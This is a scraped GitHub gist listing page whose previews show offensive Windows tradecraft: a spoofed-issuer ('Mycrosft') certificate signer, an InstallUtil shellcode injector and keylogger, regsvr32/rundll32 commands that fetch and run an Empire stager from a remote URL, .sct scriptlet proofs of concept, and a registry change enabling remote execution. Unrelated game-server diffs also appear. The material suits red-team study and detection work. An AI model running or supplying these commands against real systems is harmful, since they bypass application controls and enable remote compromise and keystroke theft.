2010phenix
2010phenix
/ signer.ps1
Created
February 22, 2017 14:40
— forked from acidburn0zzz/signer.ps1
Create a Self-Signed Executable - Without Makecert.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA) | |
| { | |
| $CAsubject = $certSubject | |
| $dn = new-object -com 'X509Enrollment.CX500DistinguishedName' | |
| $dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) | |
| #Issuer Property for cleanup | |
| $issuer = 'Mycrosft' | |
| $issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName' | |
| $issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) | |
| # Create a new Private Key |
2010phenix
/ rwxHunter.cs
Created
February 22, 2017 14:11
Locate a RWX Region in memory in InstallUtil.exe - Copy Shellcode Into It and Execute. Avoid VirtuallAlloc Call
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
2010phenix
/ iukl.cs
Created
February 22, 2017 14:09
InstallUtil Keylogger/MouseClick Recorder - Stores Logs in [Documents\Klog-Logs]
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Windows.Forms; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| //KeyStroke Mouse Clicks Code | |
| /* | |
| * https://code.google.com/p/klog-sharp/ | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |
2010phenix
/ win7-winexe-enable.cmd
Created
February 14, 2017 22:42
— forked from jbuchbinder/win7-winexe-enable.cmd
Enable winexe remote execution on windows 7
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f |
2010phenix
/ gmail_actions_example.html
Created
February 6, 2017 18:36
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- | |
| This is a sample email taken from https://developers.google.com/gmail/schemas/apps-script-tutorial | |
| and used to test the GMail actions support. | |
| --> | |
| <html> | |
| <head> | |
| <script type="application/ld+json"> | |
| { | |
| "@context": "http://schema.org", | |
| "@type": "EmailMessage", |
2010phenix
/ test.sct
Last active
February 3, 2017 20:47
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| //x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll |
2010phenix
/ gist:1027826
Created
June 15, 2011 19:01
— forked from tobmaps/gist:1027198
arena auras remove v1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/src/server/game/Entities/Unit/Unit.cpp b/src/server/game/Entities/Unit/Unit.cpp | |
| index ab38a53..faf0871 100755 | |
| --- a/src/server/game/Entities/Unit/Unit.cpp | |
| +++ b/src/server/game/Entities/Unit/Unit.cpp | |
| @@ -4039,8 +4039,8 @@ void Unit::RemoveArenaAuras(bool onleave) | |
| Aura const* aura = aurApp->GetBase(); | |
| if (!(aura->GetSpellProto()->AttributesEx4 & SPELL_ATTR4_UNK21) // don't remove stances, shadowform, pally/hunter auras | |
| && !aura->IsPassive() // don't remove passive auras | |
| - && !(aura->GetSpellProto()->AttributesEx3 & SPELL_ATTR3_DEATH_PERSISTENT) // not death persistent auras | |
| - && (aurApp->IsPositive() ^ onleave)) // remove positive buffs on enter, negative buffs on leave |
2010phenix
/ gist:1012031
Created
June 7, 2011 10:57
— forked from tobmaps/gist:1011199
Bugged t10 bonuses hackfix
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| diff --git a/src/server/game/Entities/Unit/Unit.cpp b/src/server/game/Entities/Unit/Unit.cpp | |
| index 47f8f48..5239ad1 100755 | |
| --- a/src/server/game/Entities/Unit/Unit.cpp | |
| +++ b/src/server/game/Entities/Unit/Unit.cpp | |
| @@ -11028,6 +11028,11 @@ uint32 Unit::SpellCriticalDamageBonus(SpellEntry const *spellProto, uint32 damag | |
| break; | |
| } | |
| + // all these spells should have only 50% bonus damage on crit like a magic spells | |
| + if (spellProto->Id == 55078 || spellProto->Id == 61840 || |
NewerOlder